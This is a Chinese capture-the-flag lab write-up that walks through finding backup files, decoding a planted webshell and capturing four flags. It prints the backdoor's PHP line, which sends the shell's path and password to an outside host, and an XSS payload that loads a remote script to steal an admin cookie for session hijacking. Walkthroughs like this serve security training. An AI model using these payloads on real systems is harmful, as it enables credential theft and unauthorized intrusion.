題目提示

1、目錄爆破

在對靶場進行信息收集、目錄掃描之后發(fā)現(xiàn)結(jié)果存在www.zip,data.zp 兩個備份文件

下載回來解壓之后發(fā)現(xiàn)www.zip是網(wǎng)站備份文件，data.zip是數(shù)據(jù)庫文件，存在一個maccms的數(shù)據(jù)庫
蘋果cms的數(shù)據(jù)庫，導(dǎo)入本地數(shù)據(jù)庫。

admin表

在mac_admin 管理員表中找到第一個flag: flag{ashndjkd123213}

對admin密碼進行解，嘗試后臺登錄失敗，放棄

2、網(wǎng)站源碼webshell

根據(jù)提示webshell查殺對網(wǎng)站備份www.zip進行查殺。
使用D盾進行掃描，發(fā)現(xiàn)可疑文件

看起來像個大馬，關(guān)鍵部分截

訪問對應(yīng)網(wǎng)站目錄php文件，404不存在

例如：
對webshell進行代碼審計，還原部分代碼，從php代碼中看出這個大馬對關(guān)鍵詞都進行了編碼之類的操作

發(fā)現(xiàn)一串base64字符，解碼之后得到

JHBhc3N3b3JkID0gIk1qRXlNRFkxTURFM01nYWRtaW5oYWNrZXIiOwoka2s9J2ZsYWd7YXNqZGFsa3NkajgzMmpkb2p9JzsKJHU9JF9TRVJWRVJbIkhUVFBfSE9TVCJdLiRfU0VSVkVSWyJQSFBfU0VMRSJdOwokcGhwX3NlbGY9c3Vic3RyKCRfU0VSVkVSWydQSFBfU0VMRiddLHN0cnJwb3MoJF9TRVJWRVJbJ1BIUF9TRUxGJ10sJy8nKSsxKTsKZWNobyAiPHNjcmlwdCBzcmM9J2h0dHA6Ly8xNzMuODIuMTM5LjM2OjMzMzMvYXBpLmFzcD91cmw9aHR0cDovLyR1LyRwaHBfc2VsZiZwYXNzPSRwYXNzd29yZCZpZD0xJz48L3NjcmlwdD4iOw==

第二個flag到手：flag{asjdalksdj832jdoj}

3、Xss 打cookie

對解碼的關(guān)鍵部分分析：

$password = "MjEyMDY1MDE3Mgadminhacker"; $kk='flag{asjdalksdj832jdoj}'; $u=$_SERVER["HTTP_HOST"].$_SERVER["PHP_SELE"]; $php_self=substr($_SERVER['PHP_SELF'],strrpos($_SERVER['PHP_SELF'],'/')+1); echo "<script src='http://xxx.xxx.xxx.xx:3333/api.asp?url=http://$u/$php_self&pass=$password&id=1'></script>";

從這段base64解碼結(jié)果得到新的url,訪問

http://xxx.xxx.xxx.xx:3333/api.asp

登錄入口，弱口令登錄失敗

大馬中插入了這一段，分析發(fā)現(xiàn)這段代碼是向http://xxx.xxx.xxx.xx:3333/api.asp 發(fā)送當前訪問的url和password 密碼，就是大馬路徑和訪問密碼，相關(guān)搜索后發(fā)現(xiàn)，http://xxx.xxx.xxx.xx:3333/api.asp 是一個“黑吃黑”webshell箱子，可以進行xss盜取cookie
反制

$password = "MjEyMDY1MDE3Mgadminhacker"; $kk='flag{asjdalksdj832jdoj}'; $u=$_SERVER["HTTP_HOST"].$_SERVER["PHP_SELE"]; $php_self=substr($_SERVER['PHP_SELF'],strrpos($_SERVER['PHP_SELF'],'/')+1); echo "<script src='http://xxx.xxx.xxx.xx:3333/api.asp?url=http://$u/$php_self&pass=$password&id=1'></script>";

使用在線xss 接收cookie

構(gòu)造請求url為http://xxx.xxx.xxx.xx:3333/api.asp?url=http://193.82.139.35/index.php&pass=<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='//uj.ci/da';>&id=1

等待一會收到觸發(fā)信息，返回了觸發(fā)頁http://xxx.xxx.xxx.xx:3333/admin/Php_list.asp的Cookie信息

訪問替換cookie

成功進入后臺管理頁面

ASP信封頁面發(fā)現(xiàn)第三個fla

flag{sadjhdjkdh23j1d}

php信封頁面訪問發(fā)送過來的馬子

訪問 http://xxx.xxx.xxx.xx:1080/vendor/topthink/think-helper/composer.php ，輸入密碼

c盤根目錄存在flag.txt文件

通過type flag.txt得到

5qCF5qCPCmZnMmQtM2IzLWRqbHtkd2QtZjRqLTNhMS0yMnYtZXNkfQ==

進行base64解碼得到提示是柵欄加密

進行柵欄解密

fg2d-3b3-djl{dwd-f4j-3a1-22v-esd} 柵欄解密得flag{12d-dw2-d23-vbf-34e-jsd-dj3} 第四個flag: flag{12d-dw2-d23-vbf-34e-jsd-dj3} 全部到手

總結(jié)

以上是生活随笔為你收集整理的一次打靶场记录的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。